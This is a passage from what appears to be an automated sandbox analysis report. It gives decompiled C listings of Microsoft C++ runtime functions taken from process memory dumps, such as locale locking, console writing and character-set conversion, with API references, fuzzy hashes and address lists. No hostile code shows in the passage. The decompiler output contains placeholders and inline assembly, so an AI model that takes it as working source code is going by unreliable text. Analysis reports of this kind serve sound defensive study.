							_v40 = _t104;
							_v16 = 8;
							E6D478A0B(__eflags, _t104);
							_t76 =  *((intOrPtr*)( *_t104 + 4));
							__eflags = _t76 - 0x6d451d80;
							if(_t76 != 0x6d451d80) {
								 *_t76();
							} else {
								asm("lock inc dword [edi]");
							}
							 *0x6d55a9e8 = _t104;
							_v40 = 0;
							_v16 = 0;
						} else {
							_t104 = _t61;
						}
						goto L21;
					}
					_t78 = E6D478A37();
					if(_t100 >=  *((intOrPtr*)(_t78 + 0xc))) {
						goto L12;
					}
					_t104 =  *((intOrPtr*)( *((intOrPtr*)(_t78 + 8)) + _t100 * 4));
					goto L11;
				}
				_t104 =  *((intOrPtr*)( *((intOrPtr*)(_t88 + 8)) + _t100 * 4));
				if(_t104 != 0) {
					goto L21;
				}
				goto L8;
			}

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D45D51A
std::_Lockit::_Lockit.LIBCPMT ref: 6D45D53C
std::_Lockit::~_Lockit.LIBCPMT ref: 6D45D564
__Getctype.LIBCPMT ref: 6D45D637
__Getcvt.LIBCPMT ref: 6D45D64A
std::_Facet_Register.LIBCPMT ref: 6D45D699
std::_Lockit::~_Lockit.LIBCPMT ref: 6D45D6CB

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeGetcvtRegister
String ID:
API String ID: 2755674607-0
Opcode ID: 501345c5fbbfa2e05ae28b7bcfec5ef5078f71a5c128434ff54f8deccdc5358c
Instruction ID: a100f476a4c54f8b0fcac8d096b88879bd018381eadd1e7d6761b0b67e9272a5
Opcode Fuzzy Hash: 501345c5fbbfa2e05ae28b7bcfec5ef5078f71a5c128434ff54f8deccdc5358c
Instruction Fuzzy Hash: 7961CBB0D04209CFDB21CF58C540BAEBBB4BF45318F25815DD84AAB391E774AE55CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C240C, Relevance: 10.7, APIs: 7, Instructions: 152
fileCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E6D4C240C(void* __ebx, void* __edi, void* __esi, void* __fp0, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t135;
				signed int _t136;
				void* _t137;
				void* _t150;

				_t150 = __fp0;
				_t78 =  *0x6d534074; // 0x286e79ba
				_v8 = _t78 ^ _t136;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x6d540738 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t135 = _a4;
				_v60 = _t86;
				 *_t135 = 0;
				 *((intOrPtr*)(_t135 + 4)) = 0;
				 *((intOrPtr*)(_t135 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x6d540738 + _v48 * 4));
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E6D4B5B30(_t116, _t129, _t150) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x6d540738 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x6d540738 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x6d540738 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
							} else {
								_t112 = E6D4C0616( &_v28, _t133, 2);
								_t137 = _t137 + 0xc;
								if(_t112 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E6D4C0616();
						_t137 = _t137 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t135 = GetLastError();
								} else {
									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E6D4903E3(_v8 ^ _t136);
			}

APIs

GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,6D4C2B81,?,?,?,?,?,?), ref: 6D4C244E
__fassign.LIBCMT ref: 6D4C24C9
__fassign.LIBCMT ref: 6D4C24E4
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 6D4C250A
WriteFile.KERNEL32(?,?,00000000,6D4C2B81,00000000,?,?,?,?,?,?,?,?,?,6D4C2B81,?), ref: 6D4C2529
WriteFile.KERNEL32(?,?,00000001,6D4C2B81,00000000,?,?,?,?,?,?,?,?,?,6D4C2B81,?), ref: 6D4C2562

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 66215c870bcf2f18527e55402654be8f459f9590dd844a8301e5da7285109cb9
Instruction ID: 97f2cdaded1060c31db009cf59c5982260663a49d18d2682c6d76897284216c5
Opcode Fuzzy Hash: 66215c870bcf2f18527e55402654be8f459f9590dd844a8301e5da7285109cb9
Instruction Fuzzy Hash: EF519075A00249AFDF10CFA8C895FEEBBF8EF49300F15412AE955E7241DB709941CB62

Uniqueness

Uniqueness Score: -1.00%

Function 6D48CF76, Relevance: 10.6, APIs: 7, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E6D48CF76(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t63;
				intOrPtr* _t64;
				void* _t66;
				void* _t70;

				_t48 = __ebx;
				_push(0x14);
				E6D490E9E(0x6d4fe9a2, __ebx, __edi, __esi);
				E6D476A10(_t66 - 0x14, 0);
				_t63 =  *0x6d53fe50; // 0x0
				 *(_t66 - 4) =  *(_t66 - 4) & 0x00000000;
				 *((intOrPtr*)(_t66 - 0x10)) = _t63;
				_t27 = E6D451D10();
				_t51 =  *((intOrPtr*)(_t66 + 8));
				_t28 = E6D452140( *((intOrPtr*)(_t66 + 8)), _t27);
				_t61 = _t28;
				if(_t28 != 0) {
					L5:
					E6D476A77(_t66 - 0x14);
					return E6D490E67(_t61);
				} else {
					if(_t63 == 0) {
						_push( *((intOrPtr*)(_t66 + 8)));
						_push(_t66 - 0x10);
						__eflags = E6D48D52A(__ebx, _t51, __edx, _t61, _t63, __eflags, _t70) - 0xffffffff;
						if(__eflags == 0) {
							E6D451940();
							E6D4924F4(_t66 - 0x20, 0x6d5329cc);
							asm("int3");
							_push(4);
							E6D490E9E(0x6d4fefbc, __ebx, _t61, _t63);
							_t64 = _t66 - 0x20;
							 *((intOrPtr*)(_t66 - 0x10)) = _t64;
							 *((intOrPtr*)(_t64 + 4)) =  *((intOrPtr*)(_t66 + 0xc));
							_push( *((intOrPtr*)(_t66 + 0x14)));
							_push( *((intOrPtr*)(_t66 + 8)));
							_t21 = _t66 - 4;
							 *_t21 =  *(_t66 - 4) & 0x00000000;
							__eflags =  *_t21;
							 *_t64 = 0x6d5044f4;
							 *((char*)(_t64 + 0x28)) =  *((intOrPtr*)(_t66 + 0x10));
							E6D48E2BD(_t48, _t66 - 0x20, __edx, _t61, _t64,  *_t21, _t70);
							return E6D490E67(_t64);
						} else {
							_t61 =  *((intOrPtr*)(_t66 - 0x10));
							 *((intOrPtr*)(_t66 - 0x10)) = _t61;
							 *(_t66 - 4) = 1;
							E6D478A0B(__eflags, _t61);
							 *0x6d5001e8();
							 *((intOrPtr*)( *((intOrPtr*)( *_t61 + 4))))();
							 *0x6d53fe50 = _t61;
							goto L5;
						}
					} else {
						_t61 = _t63;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6D48CF7D
std::_Lockit::_Lockit.LIBCPMT ref: 6D48CF87

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

std::_Facet_Register.LIBCPMT ref: 6D48CFD8
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48CFF8
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48D016
__EH_prolog3.LIBCMT ref: 6D48D023
_Mpunct.LIBCPMT ref: 6D48D049

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Exception@8Facet_MpunctRegisterThrow
String ID:
API String ID: 2905739349-0
Opcode ID: 636d3e7e04e287bd44c7fdb6ad514ff7c9c926d60db453f3206e46ac650a599d
Instruction ID: 3cda77f413a03b387522f7995ad9991772a050b0cafb8a2872b8494a2c626318
Opcode Fuzzy Hash: 636d3e7e04e287bd44c7fdb6ad514ff7c9c926d60db453f3206e46ac650a599d
Instruction Fuzzy Hash: 6121A93180425A9BCF05CFA5C840EEEBBB1AF84354F22440EEA14AB391DF70DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4BFDE2, Relevance: 9.2, APIs: 6, Instructions: 216
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E6D4BFDE2(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t58;
				signed int _t60;
				short* _t62;
				signed int _t66;
				short* _t70;
				int _t71;
				int _t78;
				short* _t81;
				signed int _t87;
				signed int _t90;
				void* _t95;
				void* _t96;
				int _t98;
				short* _t101;
				int _t103;
				signed int _t106;
				short* _t107;
				void* _t110;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x6d534074; // 0x286e79ba
				_v8 = _t49 ^ _t106;
				_push(__esi);
				_t103 = _a20;
				if(_t103 > 0) {
					_t78 = E6D4B5BDF(_a16, _t103);
					_t110 = _t78 - _t103;
					_t4 = _t78 + 1; // 0x1
					_t103 = _t4;
					if(_t110 >= 0) {
						_t103 = _t78;
					}
				}
				_t98 = _a32;
				if(_t98 == 0) {
					_t98 =  *( *_a4 + 8);
					_a32 = _t98;
				}
				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					return E6D4903E3(_v8 ^ _t106);
				} else {
					_t95 = _t54 + _t54;
					_t85 = _t95 + 8;
					asm("sbb eax, eax");
					if((_t95 + 0x00000008 & _t54) == 0) {
						_t81 = 0;
						__eflags = 0;
						L14:
						if(_t81 == 0) {
							L36:
							_t105 = 0;
							L37:
							E6D47AAFA(_t81);
							goto L38;
						}
						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
						_t121 = _t58;
						if(_t58 == 0) {
							goto L36;
						}
						_t100 = _v12;
						_t60 = E6D4C4DA7(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
						_t105 = _t60;
						if(_t105 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t96 = _t105 + _t105;
							_t87 = _t96 + 8;
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							__eflags = _t87 & _t60;
							if((_t87 & _t60) == 0) {
								_t101 = 0;
								__eflags = 0;
								L30:
								__eflags = _t101;
								if(__eflags == 0) {
									L35:
									E6D47AAFA(_t101);
									goto L36;
								}
								_t62 = E6D4C4DA7(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
								__eflags = _t62;
								if(_t62 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
								__eflags = _t105;
								if(_t105 != 0) {
									E6D47AAFA(_t101);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t90 = _t96 + 8;
							__eflags = _t96 - _t90;
							asm("sbb eax, eax");
							_t66 = _t60 & _t90;
							_t87 = _t96 + 8;
							__eflags = _t66 - 0x400;
							if(_t66 > 0x400) {
								__eflags = _t96 - _t87;
								asm("sbb eax, eax");
								_t101 = E6D4C1817(_t87, _t66 & _t87);
								_pop(_t87);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L35;
								}
								 *_t101 = 0xdddd;
								L28:
								_t101 =  &(_t101[4]);
								goto L30;
							}
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							E6D490FA0();
							_t101 = _t107;
							__eflags = _t101;
							if(_t101 == 0) {
								goto L35;
							}
							 *_t101 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t125 = _t105 - _t70;
						if(_t105 > _t70) {
							goto L36;
						}
						_t71 = E6D4C4DA7(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
						_t105 = _t71;
						if(_t71 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t95 + 0x00000008;
					_t85 = _t95 + 8;
					if((_t54 & _t95 + 0x00000008) > 0x400) {
						__eflags = _t95 - _t85;
						asm("sbb eax, eax");
						_t81 = E6D4C1817(_t85, _t72 & _t85);
						_pop(_t85);
						__eflags = _t81;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t81 = 0xdddd;
						L12:
						_t81 =  &(_t81[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E6D490FA0();
					_t81 = _t107;
					if(_t81 == 0) {
						goto L36;
					}
					 *_t81 = 0xcccc;
					goto L12;
				}
			}

0x6d4bfde7
0x6d4bfde8
0x6d4bfde9
0x6d4bfdf0
0x6d4bfdf4
0x6d4bfdf5
0x6d4bfdfb
0x6d4bfe01
0x6d4bfe07
0x6d4bfe0a
0x6d4bfe0a
0x6d4bfe0d
0x6d4bfe0f
0x6d4bfe0f
0x6d4bfe0d
0x6d4bfe11
0x6d4bfe16
0x6d4bfe1d
0x6d4bfe20
0x6d4bfe20
0x6d4bfe3c
0x6d4bfe42
0x6d4bfe47
0x6d4bffda
0x6d4bffed
0x6d4bfe4d
0x6d4bfe4d
0x6d4bfe50
0x6d4bfe55
0x6d4bfe59
0x6d4bfead
0x6d4bfead
0x6d4bfeaf
0x6d4bfeb1
0x6d4bffcf
0x6d4bffcf
0x6d4bffd1
0x6d4bffd2
0x00000000
0x6d4bffd8
0x6d4bfec2
0x6d4bfec8
0x6d4bfeca
0x00000000
0x00000000
0x6d4bfed0
0x6d4bfee2
0x6d4bfee7
0x6d4bfeeb
0x00000000
0x00000000
0x6d4bfef8
0x6d4bff32
0x6d4bff35
0x6d4bff38
0x6d4bff3a
0x6d4bff3c
0x6d4bff3e
0x6d4bff8a
0x6d4bff8a
0x6d4bff8c
0x6d4bff8c
0x6d4bff8e
0x6d4bffc8
0x6d4bffc9
0x00000000
0x6d4bffce
0x6d4bffa2
0x6d4bffa7
0x6d4bffa9
0x00000000
0x00000000
0x6d4bffad
0x6d4bffae
0x6d4bffaf
0x6d4bffb2
0x6d4bffee
0x6d4bfff1
0x6d4bffb4
0x6d4bffb4
0x6d4bffb5
0x6d4bffb5
0x6d4bffc2
0x6d4bffc4
0x6d4bffc6
0x6d4bfff7
0x00000000
0x00000000
0x00000000
0x00000000
0x6d4bffc6
0x6d4bff40
0x6d4bff43
0x6d4bff45
0x6d4bff47
0x6d4bff49
0x6d4bff4c
0x6d4bff51
0x6d4bff6c
0x6d4bff6e
0x6d4bff78
0x6d4bff7a
0x6d4bff7b
0x6d4bff7d
0x00000000
0x00000000
0x6d4bff7f
0x6d4bff85
0x6d4bff85
0x00000000
0x6d4bff85
0x6d4bff53
0x6d4bff55
0x6d4bff59
0x6d4bff5e
0x6d4bff60
0x6d4bff62
0x00000000
0x00000000
0x6d4bff64
0x00000000
0x6d4bff64
0x6d4bfefa
0x6d4bfeff
0x00000000
0x00000000
0x6d4bff05
0x6d4bff07
0x00000000
0x00000000
0x6d4bff1e
0x6d4bff23
0x6d4bff27
0x00000000
0x00000000
0x00000000
0x6d4bff2d
0x6d4bfe60
0x6d4bfe62
0x6d4bfe64
0x6d4bfe6c
0x6d4bfe8b
0x6d4bfe8d
0x6d4bfe97
0x6d4bfe99
0x6d4bfe9a
0x6d4bfe9c
0x00000000
0x00000000
0x6d4bfea2
0x6d4bfea8
0x6d4bfea8
0x00000000
0x6d4bfea8
0x6d4bfe70
0x6d4bfe74
0x6d4bfe79
0x6d4bfe7d
0x00000000
0x00000000
0x6d4bfe83
0x00000000
0x6d4bfe83

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,00000000,00000000,6D47312A,?,?,?,6D4C0033,00000001,00000001,9F418D08), ref: 6D4BFE3C
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,6D4C0033,00000001,00000001,9F418D08,00000000,?,?), ref: 6D4BFEC2
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,00000000,9F418D08,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 6D4BFFBC
__freea.LIBCMT ref: 6D4BFFC9

Part of subcall function 6D4C1817: HeapAlloc.KERNEL32(00000000,00000001,6D4D78BB,?,6D491D91,6D4D78BD,6D4D78BB,00000000,00000000,?,6D45140C,6D4D78BF,6D4D78BF), ref: 6D4C1849

__freea.LIBCMT ref: 6D4BFFD2
__freea.LIBCMT ref: 6D4BFFF7

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide__freea$AllocHeap
String ID:
API String ID: 3147120248-0
Opcode ID: 2c96c2fef4b873e650fccf98a1131edc09659e6c478ea88ffbd11ab84269fbf0
Instruction ID: 75019a6c6965533f8467b34cda28c3bd6eeacaef6440296edf7e4a85fdb1b704
Opcode Fuzzy Hash: 2c96c2fef4b873e650fccf98a1131edc09659e6c478ea88ffbd11ab84269fbf0
Instruction Fuzzy Hash: C9510336A11217ABEB158E64CC40EBB7BA9EB56754F21462EFD0CD7280EB35DC40C6B0

Uniqueness

Uniqueness Score: -1.00%

Function 6D45DB80, Relevance: 9.2, APIs: 6, Instructions: 157
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E6D45DB80(void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __fp0, char _a4) {
				char _v8;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				char _v44;
				char _v48;
				void* _v52;
				void* _v56;
				char _v60;
				char _v112;
				void* __ebp;
				signed int _t59;
				signed int _t60;
				intOrPtr* _t68;
				intOrPtr* _t74;
				intOrPtr _t76;
				void* _t80;
				signed int _t85;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr _t92;
				intOrPtr _t105;
				intOrPtr _t106;
				void* _t107;
				char _t109;
				intOrPtr* _t110;
				signed int _t113;
				signed int _t118;
				void* _t119;
				void* _t120;
				void* _t121;
				void* _t133;

				_t133 = __fp0;
				_t105 = __edx;
				_push(0xffffffff);
				_push(E6D4FC339);
				_push( *[fs:0x0]);
				_t120 = _t119 - 0x60;
				_t59 =  *0x6d534074; // 0x286e79ba
				_t60 = _t59 ^ _t118;
				_v20 = _t60;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t60);
				 *[fs:0x0] =  &_v16;
				_t109 = _a4;
				_v52 = _t109;
				_v48 = 0;
				E6D476A10( &_v60, 0);
				_v8 = 0;
				_t113 =  *0x6d55a9fc;
				_t88 =  *0x6d55a9e4;
				if(_t113 == 0) {
					E6D476A10( &_v56, _t113);
					_v8 = 1;
					if( *0x6d55a9fc == _t113) {
						_t85 =  *0x6d53fb40; // 0x2
						_t86 = _t85 + 1;
						 *0x6d53fb40 = _t86;
						 *0x6d55a9fc = _t86;
					}
					_v8 = 0;
					E6D476A77( &_v56);
					_t113 =  *0x6d55a9fc;
				}
				_t92 =  *((intOrPtr*)(_t109 + 4));
				if(_t113 >=  *((intOrPtr*)(_t92 + 0xc))) {
					_t110 = 0;
					__eflags = 0;
					goto L8;
				} else {
					_t110 =  *((intOrPtr*)( *((intOrPtr*)(_t92 + 8)) + _t113 * 4));
					if(_t110 == 0) {
						L8:
						if( *((char*)(_t92 + 0x14)) == 0) {
							L11:
							if(_t110 == 0) {
								goto L12;
							}
						} else {
							_t80 = E6D478A37();
							if(_t113 >=  *((intOrPtr*)(_t80 + 0xc))) {
								L12:
								if(_t88 == 0) {
									_push(0x10);
									_t110 = E6D4906EF(_t92, _t105, _t113, __eflags);
									_t121 = _t120 + 4;
									_v56 = _t110;
									_v8 = 2;
									_t68 = E6D451F50(_t88, _v52, _t110, _t113,  &_v44);
									_v8 = 3;
									__eflags =  *((intOrPtr*)(_t68 + 0x14)) - 0x10;
									_v48 = 1;
									if( *((intOrPtr*)(_t68 + 0x14)) >= 0x10) {
										_t68 =  *_t68;
									}
									L6D4519A0(_t88,  &_v112, _t105, _t110, _t133, _t68);
									_v8 = 4;
									_v48 = 3;
									 *_t110 = 0x6d500310;
									_v8 = 5;
									_t33 = _t110 + 4; // 0x4
									_t90 = _t33;
									 *_t110 = 0x6d500320;
									 *_t33 = 0;
									_v8 = 6;
									 *_t110 = 0x6d50448c;
									 *((intOrPtr*)(_t110 + 8)) = E6D47A5F4(_t33, _t110, __eflags);
									 *((intOrPtr*)(_t110 + 0xc)) = _t105;
									_v8 = 7;
									_v48 = 3;
									_v48 = 3;
									E6D451A70();
									_v8 = 0;
									_v48 = 0;
									_t106 = _v24;
									__eflags = _t106 - 0x10;
									if(__eflags < 0) {
										L20:
										_v28 = 0;
										_v24 = 0xf;
										_v44 = 0;
										_v52 = _t110;
										_v8 = 9;
										E6D478A0B(__eflags, _t110);
										_t74 =  *((intOrPtr*)( *_t110 + 4));
										__eflags = _t74 - 0x6d451d80;
										if(_t74 != 0x6d451d80) {
											goto L25;
										} else {
											asm("lock inc dword [ebx]");
										}
									} else {
										_t102 = _v44;
										_t107 = _t106 + 1;
										_t76 = _t102;
										__eflags = _t107 - 0x1000;
										if(__eflags < 0) {
											L19:
											_push(_t107);
											E6D490AE3(_t102);
											_t121 = _t121 + 8;
											goto L20;
										} else {
											_t45 = _t102 - 4; // 0xfff62d87
											_t102 =  *_t45;
											_t107 = _t107 + 0x23;
											__eflags = _t76 -  *_t45 + 0xfffffffc - 0x1f;
											if(__eflags > 0) {
												_t74 = E6D4B40D8(_t90, _t102, _t107, _t110, __eflags);
												L25:
												 *_t74();
											} else {
												goto L19;
											}
										}
									}
									 *0x6d55a9e4 = _t110;
									_v52 = 0;
									_v8 = 0;
								} else {
									_t110 = _t88;
								}
							} else {
								_t110 =  *((intOrPtr*)( *((intOrPtr*)(_t80 + 8)) + _t113 * 4));
								goto L11;
							}
						}
					}
				}
				_v8 = 0xffffffff;
				E6D476A77( &_v60);
				 *[fs:0x0] = _v16;
				return E6D4903E3(_v20 ^ _t118);
			}

0x6d45db80
0x6d45db80
0x6d45db83
0x6d45db85
0x6d45db90
0x6d45db91
0x6d45db94
0x6d45db99
0x6d45db9b
0x6d45db9e
0x6d45db9f
0x6d45dba0
0x6d45dba1
0x6d45dba5
0x6d45dbab
0x6d45dbb3
0x6d45dbb6
0x6d45dbbd
0x6d45dbc2
0x6d45dbc9
0x6d45dbcf
0x6d45dbd7
0x6d45dbdd
0x6d45dbe2
0x6d45dbec
0x6d45dbee
0x6d45dbf3
0x6d45dbf4
0x6d45dbf9
0x6d45dbf9
0x6d45dbfe
0x6d45dc05
0x6d45dc0a
0x6d45dc0a
0x6d45dc10
0x6d45dc16
0x6d45dc28
0x6d45dc28
0x00000000
0x6d45dc18
0x6d45dc1b
0x6d45dc20
0x6d45dc2a
0x6d45dc2e
0x6d45dc40
0x6d45dc42
0x00000000
0x00000000
0x6d45dc30
0x6d45dc30
0x6d45dc38
0x6d45dc48
0x6d45dc4a
0x6d45dc53
0x6d45dc5a
0x6d45dc5c
0x6d45dc5f
0x6d45dc62
0x6d45dc6d
0x6d45dc72
0x6d45dc76
0x6d45dc7a
0x6d45dc81
0x6d45dc83
0x6d45dc83
0x6d45dc89
0x6d45dc8e
0x6d45dc95
0x6d45dc9c
0x6d45dca2
0x6d45dca9
0x6d45dca9
0x6d45dcac
0x6d45dcb2
0x6d45dcb8
0x6d45dcbf
0x6d45dcca
0x6d45dccd
0x6d45dcd0
0x6d45dcdc
0x6d45dce5
0x6d45dce8
0x6d45dced
0x6d45dcf7
0x6d45dcfa
0x6d45dcfd
0x6d45dd00
0x6d45dd2a
0x6d45dd2a
0x6d45dd31
0x6d45dd38
0x6d45dd3c
0x6d45dd3f
0x6d45dd44
0x6d45dd4e
0x6d45dd51
0x6d45dd56
0x00000000
0x6d45dd58
0x6d45dd58
0x6d45dd58
0x6d45dd02
0x6d45dd02
0x6d45dd05
0x6d45dd06
0x6d45dd08
0x6d45dd0e
0x6d45dd20
0x6d45dd20
0x6d45dd22
0x6d45dd27
0x00000000
0x6d45dd10
0x6d45dd10
0x6d45dd10
0x6d45dd13
0x6d45dd1b
0x6d45dd1e
0x6d45dd99
0x6d45dd9e
0x6d45dda0
0x00000000
0x00000000
0x00000000
0x6d45dd1e
0x6d45dd0e
0x6d45dd5b
0x6d45dd61
0x6d45dd68
0x6d45dc4c
0x6d45dc4c
0x6d45dc4c
0x6d45dc3a
0x6d45dc3d
0x00000000
0x6d45dc3d
0x6d45dc38
0x6d45dc2e
0x6d45dc20
0x6d45dd6c
0x6d45dd76
0x6d45dd80
0x6d45dd98

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D45DBBD
std::_Lockit::_Lockit.LIBCPMT ref: 6D45DBDD
